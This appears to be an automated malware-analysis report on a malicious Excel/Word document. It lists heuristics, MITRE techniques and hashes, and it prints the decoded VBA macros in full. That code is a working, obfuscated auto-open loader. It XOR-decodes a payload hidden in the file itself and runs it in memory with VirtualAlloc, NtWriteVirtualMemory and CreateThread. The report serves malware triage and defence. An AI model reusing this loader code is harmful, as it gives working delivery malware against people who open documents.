MALICIOUS
118
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains both VBA and Excel 4.0 macros, with the VBA macros exhibiting obfuscation and referencing Windows API functions like VirtualAlloc and CreateThread. This suggests the macros are designed to allocate memory, write shellcode into it, and then execute it. The presence of both macro types and the API calls strongly indicate a downloader or dropper functionality, aiming to fetch and run a secondary malicious payload.
Heuristics 7
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 39,526 bytes but its declared streams total only 16,357 bytes — 23,169 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() zusLgpmnSqWIkTqmzFBWXwM -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4987 bytes |
SHA-256: b4df8f81cd3cf2eef8a82407f995313c00e13cd9565a8d35d0904cc80f186fd1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
39 of 72 identifiers look randomly generated (e.g. 'WbxcRgSnTwdnaxFKtVhxTvMRjrBluSvDEfWrDsez') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalýþmaKitabý"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function LvXrHSsspKtugtHIuojcTBJU Lib "kernel32" Alias "CreateThread" (ByVal NOPxZYGSIsmsaczVClYO As Long, ByVal zFWAuYwrkmf As Long, ByVal UuNSRFN As LongPtr, mSeyTYafswZFWuojTWEakAxghmgHM As Long, ByVal LFkQaG As Long, yHvXqYOmAjAgEYUaM As Long) As LongPtr
Private Declare PtrSafe Function dFBieQEycplChZCFYJdS Lib "kernel32" Alias "VirtualAlloc" (ByVal dHScmOaRnG As Long, ByVal zcTXWXTwuKxmSBhathuzPNJDJHad As LongPtr, ByVal DFtezRRnY As Long, ByVal AhzyAGvZBfNHKThgMt As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal npXPmRfditJp As LongPtr, ByVal uFUspoiWoHyYwVVAXsfyXLm As LongPtr, ByVal rnHvCnGSPameYOQxkt As String, ByVal HyQPVjDkbDQPJtracHNuabGiwIRCi As LongPtr, ByRef HoELEeAxLmZcEoYkDL As LongPtr) As LongPtr
#Else
Private Declare Function LvXrHSsspKtugtHIuojcTBJU Lib "kernel32" Alias "CreateThread" (ByVal NOPxZYGSIsmsaczVClYO As Long, ByVal zFWAuYwrkmf As Long, ByVal UuNSRFN As Long, mSeyTYafswZFWuojTWEakAxghmgHM As Long, ByVal LFkQaG As Long, yHvXqYOmAjAgEYUaM As Long) As Long
Private Declare Function dFBieQEycplChZCFYJdS Lib "kernel32" Alias "VirtualAlloc" (ByVal dHScmOaRnG As Long, ByVal zcTXWXTwuKxmSBhathuzPNJDJHad As Long, ByVal DFtezRRnY As Long, ByVal AhzyAGvZBfNHKThgMt As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal npXPmRfditJp As Long, ByVal uFUspoiWoHyYwVVAXsfyXLm As Long, ByVal rnHvCnGSPameYOQxkt As String, ByVal HyQPVjDkbDQPJtracHNuabGiwIRCi As Long, ByRef HoELEeAxLmZcEoYkDL As Long) As Long
#End If
Const YEUUUNRbyRGkUxkqSsiF = &H1000
Const VoVpxgg = &H40
Public Sub zusLgpmnSqWIkTqmzFBWXwM()
Dim fkqDnSPXlFagQS() As Byte
fkqDnSPXlFagQS = JTLKPgCBxelgPAAhnMxeQGT(ActiveWorkbook.FullName)
Dim IwJTmJmLvL As String
IwJTmJmLvL = StrConv(fkqDnSPXlFagQS, 64)
Dim LDZpPdHYFWZIaZBZwESjwGsSAo
LDZpPdHYFWZIaZBZwESjwGsSAo = Split(IwJTmJmLvL, "WbxcRgSnTwdnaxFKtVhxTvMRjrBluSvDEfWrDsezPibbFoAUqfyoajmBoFSzEGSabzJUAnhaQIILtLmURHUpugDuSudYzEV")
Dim AKTzVRtglYWQXzRmqJ As String
Dim adstqWbaRhqxrEzTFWcavJps As String
Dim QTKiWcVRsnJeLAJRqjty As String
adstqWbaRhqxrEzTFWcavJps = StrConv(StrConv(LDZpPdHYFWZIaZBZwESjwGsSAo(UBound(LDZpPdHYFWZIaZBZwESjwGsSAo)), 64), 128)
QTKiWcVRsnJeLAJRqjty = Mid$(adstqWbaRhqxrEzTFWcavJps, 3, Len(adstqWbaRhqxrEzTFWcavJps))
AKTzVRtglYWQXzRmqJ = tZUjEQCItrOaMAdr("qaagFFtcYxxsA", QTKiWcVRsnJeLAJRqjty)
#If VBA7 Then
Dim gXAowajuZheXnSbhoFSA As LongPtr
Dim GUHrzcqYEwHKvrUgVyxaVT As LongPtr
#Else
Dim gXAowajuZheXnSbhoFSA As Long
Dim GUHrzcqYEwHKvrUgVyxaVT As Long
#End If
gXAowajuZheXnSbhoFSA = dFBieQEycplChZCFYJdS(0, Len(AKTzVRtglYWQXzRmqJ), YEUUUNRbyRGkUxkqSsiF, VoVpxgg)
GUHrzcqYEwHKvrUgVyxaVT = NtWriteVirtualMemory(-1, gXAowajuZheXnSbhoFSA, AKTzVRtglYWQXzRmqJ, Len(AKTzVRtglYWQXzRmqJ), 0)
GUHrzcqYEwHKvrUgVyxaVT = LvXrHSsspKtugtHIuojcTBJU(0, 0, gXAowajuZheXnSbhoFSA, 0, 0, 0)
End Sub
Public Function JTLKPgCBxelgPAAhnMxeQGT(ByVal bAOVKEucjMFJ As String) As Byte()
Dim adstqWbaRhqxrEzTFWcavJps As Long
Dim QTKiWcVRsnJeLAJRqjty() As Byte
adstqWbaRhqxrEzTFWcavJps = FreeFile
If LenB(Dir(bAOVKEucjMFJ)) Then
Open bAOVKEucjMFJ For Binary Access Read As adstqWbaRhqxrEzTFWcavJps
ReDim QTKiWcVRsnJeLAJRqjty(LOF(adstqWbaRhqxrEzTFWcavJps) - 1&) As Byte
Get adstqWbaRhqxrEzTFWcavJps, , QTKiWcVRsnJeLAJRqjty
Close adstqWbaRhqxrEzTFWcavJps
Else
Err.Raise 53
End If
JTLKPgCBxelgPAAhnMxeQGT = QTKiWcVRsnJeLAJRqjty
Erase QTKiWcVRsnJeLAJRqjty
End Function
Public Sub Document_Open()
zusLgpmnSqWIkTqmzFBWXwM
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function tZUjEQCItrOaMAdr(VfuGYrQOUwtiezVTjwTQYslsiY As String, UdZZGzyoodRvIduJtjzoRSgDdjBS As String) As String
Dim TcxZvVLVwMIGlHQrbl As Long
Dim DIRjIKecWwWwYFMubuvmhJO As String
Dim wQIGkqlbYOoTbSOprTOzAqKbznPW As Integer, chzVDFRK As Integer, a As Long
For TcxZvVLVwMIGlHQrbl = 1 To Len(UdZZGzyoodRvIduJtjzoRSgDdjBS)
a = TcxZvVLVwMIGlHQrbl Mod Len(VfuGYrQOUwtiezVTjwTQYslsiY)
If a = 0 Then a = Len(VfuGYrQOUwtiezVTjwTQYslsiY)
wQIGkqlbYOoTbSOprTOzAqKbznPW = Asc(Mid$(UdZZGzyoodRvIduJtjzoRSgDdjBS, TcxZvVLVwMIGlHQrbl, 1))
chzVDFRK = Asc(Mid$(VfuGYrQOUwtiezVTjwTQYslsiY, a, 1))
DIRjIKecWwWwYFMubuvmhJO = DIRjIKecWwWwYFMubuvmhJO + Chr(wQIGkqlbYOoTbSOprTOzAqKbznPW Xor chzVDFRK)
Next TcxZvVLVwMIGlHQrbl
tZUjEQCItrOaMAdr = DIRjIKecWwWwYFMubuvmhJO
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.